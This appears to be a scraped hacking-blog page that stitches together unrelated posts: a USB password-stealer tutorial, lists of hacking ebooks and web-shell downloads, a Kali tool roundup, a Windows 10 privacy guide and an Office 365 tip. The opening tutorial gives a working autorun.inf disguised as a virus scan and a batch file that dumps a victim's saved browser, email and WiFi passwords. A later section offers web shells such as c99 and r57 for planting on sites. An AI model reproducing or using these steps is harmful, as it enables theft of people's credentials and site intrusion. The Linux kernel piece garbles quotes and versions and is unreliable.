tv crime2In this era of corporate hacking, stealing personal details and putting them on sites such as Pastebin here is an easy way to backup or steal passwords.
Requirements –

1. A PC
2. USB drive
3. Internet Connection ( for downloading file )

Before going to start I’ve listed some tools that will help you in this article. Which you can easily get it here www.nirsoft.net/

ChromePass – ChromePass is a small password recovery tool for Windows that allows you to view the user names and passwords stored by Google Chrome Web browser

Password Fox – PasswordFox is a small
password recovery tool for Windows that allows you to view the user names and passwords stored by Mozilla Firefox Web browser.

Mail PassView -Recovers the passwords of the email programs( i.e gmail,yahoo,Outllok Express etc).

WebBrowser PassView –  WebBrowser PassView is a password recovery tool that reveals the passwords stored by the following Web browsers: Internet Explorer (Version 4.0 – 8.0), Mozilla Firefox (All Versions), Google Chrome and Opera. This tool can be used to recover your lost/forgotten password of any Website, including popular Web sites, like Facebook, Yahoo, Google, and GMail, as long as the password is stored by your Web Browser. After
retrieving your lost passwords, you can save them into text/html/csv/xml file, by using the ‘Save Selected Items’ option (Ctrl+S).

WirelessKeyView:-WirelessKeyView recovers all wireless network keys (WEP/WPA) stored in your computer

Steps

1. Extract the files you downloaded to your desktop and copy all the .exe files to your USB

2. Create a new file in Notepad and write the following text into it –

[autorun] open=run.bat
ACTION= Scan your device for virus

Save the Notepad as autorun.inf
Now copy the autorun.inf file onto your USB pendrive.

3. Create another Notepad and write the following code on it.

start ChromePass.exe /stext ChromePass.txt
start mailpv.exe /stext mailpv.txt
start WebBrowserPassView.exe /
stext WebBrowserPassView.txt
start WirelessKeyView.exe /stext WirelessKeyView.txt
start PasswordFox.exe /stext passwordfox.txt

save the notepad file as “run.bat”.
Copy the run.bat file also to your USB drive.

Now your USB password stealer is ready. Insert it in your victims computer and then click on the popup Scan your device for virus when you click on it your USB password stealer will do it’s magic and all the passwords saved on the system will be saved in .txt file.

Have a try and feel free to paste the results in the comments section below.

 

tv - programer

Free hacking ebooks where you can download from the links below.

  1. Black Belt Hacking & Complete Hacking Book
  2. Hackers High School 13 Complete Hacking E-books
  3. Penentration Testing With Backtrack 5
  4. A Beginners Guide To Hacking Computer Systems
  5. Black Book of Viruses and Hacking
  6. Secrets of Super and Professional Hackers
  7. Dangerours Google Hacking Database and Attacks
  8. Internet Advanced Denial of Service (DDOS) Attack
  9. Computer Hacking & Malware Attacks for Dummies
  10. G-mail Advance Hacking Guides and Tutorials
  11. Vulnerability Exploit & website Hacking for Dummies
  12. Web App Hacking (Hackers Handbook)
  13. Security Crypting Networks and Hacking
  14. Botnets The Killer Web Applications Hacking
  15. Hacking attacks and Examples Test
  16. Network Hacking and Shadows Hacking Attacks
  17. Gray Hat Hacking and Complete Guide to Hacking
  18. Advance Hacking Exposed Tutorials
  19. 501 Website Hacking Secrets
  20. Internet Security Technology and Hacking
  21. CEH Certified Ethical Hacker Study Guide
  22. Advanced SQL Injection Hacking and Guide
  23. Web Hacking & Penetration testing
  24. OWASP Hacking Tutorials and Web App Protection
  25. CEH – Hacking Database Secrets and Exploit
  26. Ethical Hacking Value and Penetration testing
  27. Hack any Website, Complete Web App Hacking
  28. Beginners Hackers and tutorials 
  29. Ethical Hacking Complete E-book for Beginners
  30. Backtrack : Advance Hacking tutorials
  31. SQL Injection attacks and tutorials by Exploit DB
  32. XSS + Vulnerability Exploitation & Website Hacking
  33. Ultimate Guide to Social Enginnering attacks
  34. White Hat Hacking complete guide to XSS Attacks 
  35. Cross Site Scripting and Hacking Websites 
  36. The Hackers Underground Handbook ( hack the system)
  37. Blind SQL Injection tutorials and Hacking
  38. Hacking Secrets Revealed
  39. Hacking Website Database and owning systems
  40. Reverse Engineering for Beginners 
  41. Reverse Enginnering (The Real Hacking)
  42. Computer Hacking
  43. Hack your Friend using Backtrack
  44. Reverse Enginnering Hacking and Cracking
  45. Hack the System for beginners
  46. Hacking into Computer Systems
  47. Blind SQL Injection Discovery & Exploitation
  48. CEH v8

Note : These best hacking e-books are only for the ethical knowledge purpose and must not be used for illegal purposes.

In computer security, a shellcode is a small piece of code used as the payload in the exploitation of a software vulnerability.
Hackers usually take advantage of an upload panel designed for uploading images onto sites. This is usually found once the hacker has logged in as the admin of the site. Shells can also be uploaded via exploits or remote file inclusion.

 Download Shells And there txt/sources

 asp.rar asp.txt
 aspx.rar (not yet avalible txt file is avalible) aspx.txt
 b374k.rar b374k.txt(notavalible)
 c99.rar (not yet avalible txt file is avalible) c99.txt
 cmdshell.rar (not yet avalible txt file is avalible) cmdshell.txt
 mysql.rar mysql.txt
 r57.rar r57.txt
 sadrazam.rar sadrazam.txt
 webadmin.rar webadmin.txt

Also read https://thehacktoday.com/about-hackers-shell/

 

Source: https://thehacktoday.com/

Arnold-s-T-800-Terminator-Runs-Linux-Kernel-4-1

 

Back in February, when Linus Torvalds announced that it was time for the version 4.0 of Linux kernel, the Linux enthusiasts found an unlikely reason to be excited. Willing to know this reason? Around the same time, a Reddit user spotted that Skynet’s T-800 Terminator used by Arnold Schwarzenegger was actually running the same Linux kernel 4.1.15.

Earlier this week, Greg Kroah-Hartman released the Linux kernel 4.1.15. If we believe the Terminator movies, this release has brought Skynet closer to reality. It looks like Skynet knows why humans admire Linux.

If Linus Torvalds would have decided to walk on a straight line, the next logical kernel version after 3.19 would have been Linux 3.20 as kernel 4.0 wasn’t going to feature any massive change from Linux 3.19.

In the past, showing his love for Skynet, Linus Torvalds has made the following argument to support his decision:

The strongest argument for some people advocating 4.0 seems to have been a wish to see 4.1.15 – because “that was the version of Linux Skynet used for the T-800 terminator.

The time of 2.x and 3.x branch is now passed, and the 4.x branch is here with latest 4.1.15 release. Linux kernel 4.1.15 is the branch of 4.1.x LTS version and it’s available for download.

Read the kernel 4.1.15 changelog here and download it from Linux kernel archives right now.

 

http://www.geekboy.co

tv - programerWhat is Penetration Testing?

Pen tests can be automated with software applications or they can be performed manually. Either way, the process includes gathering information about the target before the test (reconnaissance), identifying possible entry points, attempting to break in (either virtually or for real) and reporting the findings.

The main objective of penetration testing is to determine security weaknesses. A pen test can also be used to test an organization’s security policy compliance, its employees’ security awareness and the organization’s ability to identify and respond to security incidents.

Penetration tests are sometimes called white hat attacks because in a pen test, the good guys are attempting to break in.

What’s Kali Linux ?

Kali Linux is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools aimed at various information security tasks, such as Penetration Testing, Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by Offensive Security, a leading information security training company.

Top 19 Penetration Testing Tool In Kali linux 2.0

 

meta1. Metasploit

This is the most advanced and popular Framework that can be used to for pen-testing. It is based on the concept of ‘exploit’ which is a code that can surpass the security measures and enter a certain system. If entered, it runs a ‘payload’, a code that performs operations on a target machine, thus creating the perfect framework for penetration testing.

It can be used on web applications, networks, servers etc. It has a command-line and a GUI clickable interface, works on Linux, Apple Mac OS X and Microsoft Windows. This is a commercial product, although there might be free limited trials available.

armi2. Armitage

Armitage is a scriptable red team collaboration tool for Metasploit that visualizes targets, recommends exploits, and exposes the advanced post-exploitation features in the framework.

Through one Metasploit instance, your team will:

 

Use the same sessions

Share hosts, captured data, and downloaded files

Communicate through a shared event log.

Run bots to automate red team tasks.

wire3. Wireshark

This is basically a network protocol analyzer –popular for providing the minutest details about your network protocols, packet information, decryption etc. It can be used on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many other systems. The information that is retrieved via this tool can be viewed through a GUI, or the TTY-mode TShark utility.

 

burp4. Burpsuite

Burp suite is also essentially a scanner (with a limited “intruder” tool for attacks), although many security testing specialists swear that pen-testing without this tool is unimaginable. The tool is not free, but very cost effective. Take a look at it on below download page. It mainly works wonders with intercepting proxy, crawling content and functionality, web application scanning etc.  You can use this on Windows, Mac OS X and Linux environments.

 

acun5. Acunetix

Acunetix is essentially a web vulnerability scanner targeted at web applications. It provides SQL injection, cross site scripting testing, PCI compliance reports etc. along with identifying a multitude of vulnerabilities. While this is among the more ‘pricey’ tools.

 

john6. John The Ripper

Another password cracker in line is, John the Ripper. This tool works on most of the environments, although it’s primarily for UNIX systems. It is considered one of the fastest tools in this genre. Password hash code and strength-checking code are also made available to be integrated to your own software/code which I think is very unique. This tool comes in a pro and free form.

 

set7. Social Engineer Toolkit

The Social-Engineer Toolkit (SET) is a unique tool in terms that the attacks are targeted at the human element than on the system element. It has features that let you send emails, java applets, etc containing the attack code. It goes without saying that this tool is to be used very carefully and only for ‘white-hat’ reasons.  It has a command-line interface, works on Linux, Apple Mac OS X and Microsoft Windows.

nmap8. Nmap

“Network Mapper” though not necessarily a pen-testing tool, it is a must-have for the ethical hackers. This is a very popular tool that predominantly aids in understanding the characteristics of any target network. The characteristics can include: host, services, OS, packet filters/firewalls etc.  It works on most of the environments and is open sourced.

 

beef9. BeEF

BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser- what this means is that, it takes advantage of the fact that an open web-browser is the window(or crack) into a target system and designs its attacks to go on from this point on . It has a GUI interface, works on Linux, Apple Mac OS X and Microsoft Windows.

 

air10. Aircrack-ng

Aircrack-ng is an 802.11 WEP and WPA-PSK keys cracking program that can recover keys once enough data packets have been captured. It implements the standard FMS attack along with some optimizations like KoreK attacks, as well as the PTW attack, thus making the attack much faster compared to other WEP cracking tools.

In fact, Aircrack-ng is a set of tools for auditing wireless networks.

sqlmap11. Sqlmap

Sqlmap is again a good open source pen testing tool. This tool is mainly used for detecting and exploiting SQL injection issues in an application and hacking over of database servers. It comes with command-line interface. Platform: Linux, Apple Mac OS X and Microsoft Windows are supported platforms.

etta12. Ettercap

Ettercap is a free and open source network security tool for man-in-the-middle attacks on LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows.

hydra13. Hydra

Hydra is a parallelized login cracker which supports numerous protocols to attack. It is very fast and flexible, and new modules are easy to add. This tool makes it possible for researchers and security consultants to show how easy it would be to gain unauthorized access to a system remotely.

It supports: Cisco AAA, Cisco auth, Cisco enable, CVS, FTP, HTTP(S)-FORM-GET, HTTP(S)-FORM-POST, HTTP(S)-GET, HTTP(S)-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MySQL, NNTP, Oracle Listener, Oracle SID, PC-Anywhere, PC-NFS, POP3, PostgreSQL, RDP, Rexec, Rlogin, Rsh, SIP, SMB(NT), SMTP, SMTP Enum, SNMP v1+v2+v3, SOCKS5, SSH (v1 and v2), SSHKEY, Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP.

malt14. Maltego

Maltego is a program built into Kali Linux that lets you do reconnaissance on any person, by scraping up data from all publicly available areas of the Internets. Maltego is used for information gathering and data-mining, and can be useful for anyone who needs to gather data on a person or company

 

nikkto15. Nikto

Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items, including over 6400 potentially dangerous files/CGIs, checks for outdated versions of over 1200 servers, and version specific problems on over 270 servers.

 

ninja16. Sqlninja

Sqlninja, as the name indicates is all about taking over the DB server using SQL injection in any environment. This product by itself claims to be not so stable its popularity indicates how robust it is already with the DB related vulnerability exploitation. It has a command-line interface, works on Linux, Apple Mac OS X and not on Microsoft Windows.

 

core17. CORE Impact

CORE Impact Pro can be used to test mobile device penetration, network/network devise penetration, password identification and cracking, etc. It has a command-line and a GUI clickable interface, works Microsoft Windows. This is one of the expensive tools in this line.

canvas18. Canvas

Immunity’s CANVAS is a widely used tool that contains more than 400 exploits and multiple payload options. It renders itself useful for web applications, wireless systems, networks etc. It has a command-line and GUI interface, works on Linux, Apple Mac OS X and Microsoft Windows. It is not free of charge and can more information can be found at below page.

retina19. Retina

As opposed to a certain application or a server, Retina targets the entire environment at a particular company/firm. It comes as a package called Retina Community. It is a commercial product and is more of a vulnerability management tool more than a pen-testing tool. It works on having scheduled assessments and presenting results. Check out more about this package at below page.

 

Windows TVIf you have installed Windows 10 and agreed to its terms and conditions during installation then you are being spied on and this is not a conspiracy theory but a fact.

Here’s what’s going on and how you can prevent yourself from being spied on.

Microsoft’s new service agreement consists of about 12,000 words, which clearly states that the operating system will be invading your privacy like never before and if you haven’t read that then it’s not your mistake, we hardly read TOS (Terms Of Service) anyway.

So the Microsoft’s new service agreement states that,

WE WILL ACCESS, DISCLOSE AND PRESERVE PERSONAL DATA, INCLUDING YOUR CONTENT (SUCH AS THE CONTENT OF YOUR EMAILS, OTHER PRIVATE COMMUNICATIONS OR FILES IN PRIVATE FOLDERS), WHEN WE HAVE A GOOD FAITH BELIEF THAT DOING SO IS NECESSARY TO.”

Microsoft does, however, also gives you an option to opt-out of features that you think may be invading your privacy, but remember if you have installed Windows 10 you have opted-in for all features by default.

HOW TO STOP WINDOWS 10 FROM SPYING ON YOU

If you are reading this section because you are seriously worried about this, understand that opting out of Windows 10 is not so straightforward. However, if you follow each of the mentioned steps thoroughly then you will be able to prevent yourself from Windows 10 spying in no time.

NOTE: These steps will be appropriate in both cases, either you are about to install Windows 10 on your computer, or if you have already installed it without paying extra attention to the installation instructions. Depending on your situation, you might need to perform all of the following.

Here are 4 simple tasks you have to follow to stop Windows 10 from spying on you:

Task # 1: Go to ‘Settings’ -> ‘Privacy’. From there you will have to go through 13 different selection screens, turning everything of your concern to ‘off’. After that, you will find some of the most important setting under ‘General’ section, whereas the other setup screens will let you select whether you want specific Windows apps to access your messages, camera, calendar and other areas.

Task # 2: You might also want to change Cortana’s settings, turning every option to ‘off’. But your selections completely depends on whether you are finding this feature useful or not.

Task # 3: This one is an essential option that you have to turn off. And many are going to miss this one because these settings are only changeable through an external website. So head over tohttps://choice.microsoft.com/en-gb/opt-out, there you will find two selections i.e. “Personalized ads in this browser” and “Personalised ads wherever I use my Microsoft account”. Turn both of them to ‘off’.

Ms-personal-ad-preferences

Task # 4: To add another layer of privacy, you might also be interested in removing your Microsoft account from Windows 10, and use some local account instead. Doing this might take away some of the features like Synchronisation across other devices, OneDrive and Windows Store – won’t be a big deal for many! So to remove your Microsoft account, head over to ‘Settings’ -> ‘Accounts’ -> ‘Your Account within Windows 10’, and from there you will be able to remove the account.

Windows 10 will sync data and settings by default with its servers. That includes browser history, currently open web pages, favorites pages, websites, saved apps, Wi-Fi network names and passwords and mobile hotspot passwords.

We also advise you not to activate Cortana, Microsoft’s personal virtual assistant, but if you have already activated it here’s what you’ve allowed it to collect:

  • Your device location
  • Your email and text messages data
  • Your Calendar data
  • Apps you are using
  • Your contact list
  • Who’s calling you
  • With who you are in touch more often
  • Your alarm settings,
  • Your music on device
  • What you purchase
  • Your search history in case you’re using Bing search engine.

“TO ENABLE CORTANA TO PROVIDE PERSONALIZED EXPERIENCES AND RELEVANT SUGGESTIONS, MICROSOFT COLLECTS AND USES VARIOUS TYPES OF DATA, SUCH AS YOUR DEVICE LOCATION, DATA FROM YOUR CALENDAR, THE APPS YOU USE, DATA FROM YOUR EMAILS AND TEXT MESSAGES, WHO YOU CALL, YOUR CONTACTS AND HOW OFTEN YOU INTERACT WITH THEM ON YOUR DEVICE.”

This is not it,

“CORTANA ALSO LEARNS ABOUT YOU BY COLLECTING DATA ABOUT HOW YOU USE YOUR DEVICE AND OTHER MICROSOFT SERVICES, SUCH AS YOUR MUSIC, ALARM SETTINGS, WHETHER THE LOCK SCREEN IS ON, WHAT YOU VIEW AND PURCHASE, YOUR BROWSING AND BING SEARCH HISTORY, AND MORE.”

Windows 10 can also use you for marketing and advertising purposes as it generates a unique advertising ID for users on every device which can be further used to serve commercial content.

Though Windows 10 comes with default capability of automatically detecting malware on user’s PC, but when it’s collecting personal data as such a level you don’t need a malware.

So Windows 10 is spying on you, do opt-out from all such features you think are privacy invasion for you.

tv - programer

There is one key administrative feature that seems to be missing from Microsoft Office 365 – the “kill switch” that disables an Office 365 account and kills all active sessions (browser, ActiveSync, etc.).  Without official guidance from Microsoft, there has been speculation from Office 365 Admins on the best approach for disabling access to an Office 365 account in the event of a breach or security issue.

  • Change the password on the mailbox
  • Remove the mailbox using the “Remove-Mailbox” command
    • For example:
Remove-Mailbox -Identity "John Rodman"
  • Wait 15 minutes
  • Restore the mailbox

Restoring the mailbox is an important step in this process, since the mailbox will be automatically deleted if you do not restore it within 30 days.